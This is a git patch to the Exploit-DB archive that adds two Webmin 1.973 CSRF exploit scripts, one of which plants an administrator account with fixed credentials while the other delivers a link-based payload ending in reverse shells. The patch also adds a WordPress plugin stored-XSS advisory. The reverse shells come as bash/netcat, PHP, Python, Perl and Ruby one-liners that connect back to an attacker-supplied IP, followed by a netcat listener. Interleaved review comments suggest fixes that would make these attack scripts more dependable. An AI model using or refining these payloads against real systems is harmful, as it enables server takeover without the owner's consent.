From 7014821c65ae46c8270445f8510338a7445f6271 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Jul 2021 05:01:52 +0000 Subject: [PATCH] DB: 2021-07-21 3 changes to exploits/shellcodes Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) --- exploits/linux/webapps/50126.py | 230 ++++++++++++++++++++++++++++++++ exploits/linux/webapps/50144.py | 122 +++++++++++++++++ exploits/php/webapps/50143.txt | 16 +++ files_exploits.csv | 3 + 4 files changed, 371 insertions(+) create mode 100755 exploits/linux/webapps/50126.py create mode 100755 exploits/linux/webapps/50144.py create mode 100644 exploits/php/webapps/50143.txt diff --git a/exploits/linux/webapps/50126.py b/exploits/linux/webapps/50126.py new file mode 100755 index 000000000..1f9577713 --- /dev/null +++ b/exploits/linux/webapps/50126.py 
@@ -0,0 +1,230 @@ +# Exploit Title: Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) +# Date: 24/04/2021 +# Exploit Author: *Mesh3l_911 & Z0ldyck +# Vendor Homepage: https://www.webmin.com +# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 +# Version: Webmin 1.973 +# Tested on: All versions <= 1.973 +# CVE : CVE-2021-31762 +# POC: https://youtu.be/qCvEXwyaF5U + + +import time, subprocess + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'acl/save_user.cgi' +else: + target = target + '/acl/save_user.cgi' + + +def CSRF_Generator(): + with open('CSRF_POC.html', 'w') as POC: + POC.write \ + (''' + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + ''') + POC.close() + + print( + "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m") + + + +def main(): + CSRF_Generator() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/50144.py b/exploits/linux/webapps/50144.py new file mode 100755 index 000000000..da2149f35 --- /dev/null +++ b/exploits/linux/webapps/50144.py 
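Review bot: The form written by `CSRF_Generator` registers the new Webmin user with a fixed username and password (`Mesh3l_Z0ldyck` / `Mesh3l_Z0ldyck123`, per the closing message) and nothing in the script lets the operator change them, so every run plants a well-known credential on the target; read both from `input()` before the `with open(...)` block, substitute them into the form fields, and print the values actually used. The HTML body itself did not survive extraction in this listing, so it is not visible whether the page suppresses the `Referer` header; Webmin's referer checking (enabled in stock installs, as far as I know) rejects cross-origin referers, so the header comments should state the precondition the PoC relies on — an admin logged into Webmin in the same browser, and how the referer check is dealt with. `# Tested on: All versions <= 1.973` reads as a claim nobody could have tested; `# Affected: <= 1.973 (per vendor fix), tested on 1.973` is more honest. Smaller points: `subprocess` is imported but never used in this file, and `POC.close()` is redundant inside the `with` block.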
@@ -0,0 +1,122 @@ +# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) +# Date: 24/04/2021 +# Exploit Author: Mesh3l_911 & Z0ldyck +# Vendor Homepage: https://www.webmin.com +# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 +# Version: Webmin 1.973 +# Tested on: All versions <= 1.973 +# CVE: CVE-2021-31761 +# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to +# get a Remote Command Execution (RCE) through the Webmin's running process +# feature + +import time, subprocess,random,urllib.parse + + +print('''\033[1;37m + + __ __ _ ____ _ _________ _ _ _ +| \/ | | | |___ \| | |___ / _ \| | | | | | +| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ +| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / +| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < +|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ + __/ | + |___/ + + \033[1;m''') + +for i in range(101): + print( + "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( + i), "\033[1;36m%\033[1;m", end="") + time.sleep(0.02) +print("\n\n") + +target = input( + "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") + +if target.endswith('/'): + target = target + 'tunnel/link.cgi/' +else: + target = target + '/tunnel/link.cgi/' + +ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") + +port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. 
( 1337 ) > \033[1;m") + +ReverseShell = input \ +('''\033[1;37m +\n +1- Bash Reverse Shell \n +2- PHP Reverse Shell \n +3- Python Reverse Shell \n +4- Perl Reverse Shell \n +5- Ruby Reverse Shell \n +\033[1;m + +\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') + +file_name = random.randrange(1000) + +if ReverseShell == '1': + ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' + +elif ReverseShell == '2': + ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' + +elif ReverseShell == '3': + ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' + +elif ReverseShell == '4': + ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' + +elif ReverseShell == '5': + ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' + +else: + print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") + + +def CSRF_Generator(): + Payload = urllib.parse.quote(''' + + + + + + + +
+ + + + + + +
+ + + + + + ''') + + print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") + + print(target+Payload) + +def Netcat_listener(): + print() + subprocess.run(["nc", "-nlvp "+port+""]) + + +def main(): + CSRF_Generator() + Netcat_listener() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/50143.txt b/exploits/php/webapps/50143.txt new file mode 100644 index 000000000..eb0b13250 --- /dev/null +++ b/exploits/php/webapps/50143.txt @@ -0,0 +1,16 @@ +# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) +# Date: 19/07/2021 +# Exploit Author: Aakash Choudhary +# Software Link: https://wordpress.org/plugins/kn-fix-your/ +# Version: 1.0.1 +# Category: Web Application +# Tested on Mac + +How to Reproduce this Vulnerability: + +1. Install WordPress 5.7.2 +2. Install and activate KN Fix Your Title +3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field. +4. Click Save Changes. +5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. +6. Payload Used: "> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 63c4737dd..a1a9e59de 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
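Review bot: `Netcat_listener` hands netcat one argv element `"-nlvp 1337"` (the `"-nlvp "+port` concatenation) instead of separate `-nlvp` and port tokens, so the port reaches getopt glued to the option string with a leading space and whether it is accepted depends on the netcat variant; use `subprocess.run(["nc", "-nlvp", port])` and validate `port` with `int(port)` right after the prompt, since the same string is also spliced unquoted into every reverse-shell command. The menu's `else` branch only prints `Please Re-Check ur input` and falls through, so an unrecognised choice leaves `ReverseShell` holding the raw input, which is then URL-encoded into the payload and the listener starts anyway; add `raise SystemExit(1)` after that print. Option 1 creates its fifo at `/tmp/<randrange(1000)>`, a predictable name in a world-writable directory that another local user can pre-create or race; `mktemp -u` inside the command (or `secrets.token_hex(8)` for the name) avoids that. The HTML/JS in `Payload` did not survive extraction here, so the request that reaches `run.cgi` is not visible; the header should state what the PoC depends on — an admin logged into Webmin opening the link, presumably with the tunnel (`tunnel/link.cgi`) and running-processes modules enabled — and why the title names `run.cgi` while the link targets `tunnel/link.cgi/`.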
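Review bot: The advisory does not say which role can reach the Separator field; it sits under Settings, so presumably an administrator is required, and on a single-site WordPress an administrator normally holds `unfiltered_html`, which confines this stored XSS to multisite or hardened installs where that capability is removed — a line such as `# Privileges required: administrator (Settings → Fix Title); impact depends on unfiltered_html being absent` would let readers gauge impact. The payload in step 6 appears here only as `">` (probably lost in extraction) and the request parameter behind the field is never named, so stating the exact injected string in a form that survives rendering plus the option/parameter name would make the steps reproducible. No fixed version is given either; `# Fixed in: <release>` or `# Fixed in: none at time of publication` belongs in the header.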
@@ -26046,6 +26046,7 @@ id,file,description,date,author,type,platform,port
 12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
 12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
 12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
+50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@@ -44275,3 +44276,5 @@ id,file,description,date,author,type,platform,port
 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php,
 50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php,
 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,
+50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",2021-07-20,"Aakash Choudhary",webapps,php,
+50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",2021-07-20,Mesh3l_911,webapps,linux,